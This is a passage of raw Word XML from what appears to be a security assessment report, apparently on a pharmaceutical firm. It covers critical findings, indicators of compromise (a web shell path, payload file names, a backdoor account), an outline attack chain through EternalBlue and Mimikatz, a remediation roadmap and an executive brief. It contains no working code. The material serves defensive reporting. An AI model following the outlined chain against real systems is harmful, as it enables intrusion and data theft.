      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>71][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>72]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Systems: Organization-wide</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Impact: IP theft undetected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Remediation: Deploy Microsoft Purview DLP; block unauthorized uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Cost: £80,000 + £40,000/year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>4. AWS S3 Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> – CRITICAL (CVSS 9.6) [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>73][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>74][75]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Public read access on clinical trial bucket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve">Remediation: Disable public access; enable AWS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Cost: £0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>5. Jenkins Credential Exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> – CRITICAL (CVSS 9.2) [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>76][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>77]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>AWS keys stored in plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:lastRenderedPageBreak/>
        <w:t>Remediation: Rotate credentials, use AWS Secrets Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Cost: £5,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>High-Severity Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve">No WAF, flat network, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> VNC open, unpatched Windows 7, weak R&amp;D file ACLs, insufficient logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Indicators of Compromise (IOCs):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> 192.168.10.200 C2; 192.168.10.142 suspicious outbound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>svcupdate.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Accounts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> backdoor, compromised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>rdadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Behavioral:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> scans, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> loaded, SQL injection attempts, large data transfer, scheduled tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Attack Chain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:br/>
        <w:t>[Kali Linux Scanning] → [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> Exploit] → [Windows 7 Compromised] → [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>] → [R&amp;D Access] → [Data Collection] → [Backdoor/MySQL Dump/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>] → [Exfiltration] → [Persistence]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Phase 1 (0–30 days): Emergency Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Patch Windows 7; remove default creds/backdoors; implement MFA; temporary WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Phase 2 (30–90 days): Foundational Controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Deploy EDR, SOC, vulnerability scanning, WAF, upgrade OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Phase 3 (90–180 days): Advanced Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Network segmentation, DB activity monitoring, secure code review, SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00387B68" w:rsidRDefault="00983613" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.7 Executive Brief</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bottom Line:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP stolen within 13 days, undetected. Current controls insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP Theft: £250M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Regulatory fines: £4–15M [74]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Clinical trial sabotage: £50M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reputational damage: 15% stock loss</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Top Priorities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MFA – £50K, prevent 99.9% credential attacks [62]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
